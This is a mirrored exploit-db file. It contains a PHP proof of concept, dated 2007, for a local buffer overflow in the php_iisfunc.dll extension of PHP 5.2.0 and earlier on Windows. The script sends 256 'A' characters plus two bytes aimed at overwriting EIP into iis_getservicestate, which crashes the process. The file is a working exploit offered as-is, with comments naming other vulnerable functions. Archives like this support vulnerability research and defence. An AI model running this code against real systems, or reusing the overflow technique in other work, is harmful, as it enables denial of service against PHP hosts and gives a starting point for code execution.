exploit-db-mirror/exploits/windows_x86/dos/4318.php
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

32 lines
No EOL
1 KiB
PHP

<?php
// ==================================================================================
//
// php_iisfunc.dll PHP <= 5.2.0 (win32) Buffer Overflow PoC
//
// Discovery: boecke <boecke@herzeleid.net>
// Risk: Local Buffer Overflow (Medium - High Risk)
// Notes: Various other functions are exploitable, all of which convert the
// string argument(s) to unicode.
//
// extern "C" IISFUNC_API int fnStartService(LPCTSTR ServiceId);
// extern "C" IISFUNC_API int fnGetServiceState(LPCTSTR ServiceId);
// extern "C" IISFUNC_API int fnStopService(LPCTSTR ServiceId);
//
// "Sangre, sonando, de rabia naci.. Who do you trust?"
// - Cygnus, Vismund Cygnus: Sarcophagi
//
// ==================================================================================
if ( !extension_loaded( "iisfunc" ) )
{
die( "Extension not loaded.\n" );
}
$buf_unicode = str_repeat( "A", 256 );
$eip_unicode = "\x41\x41";
iis_getservicestate( $buf_unicode . $eip_unicode );
?>
# milw0rm.com [2007-08-27]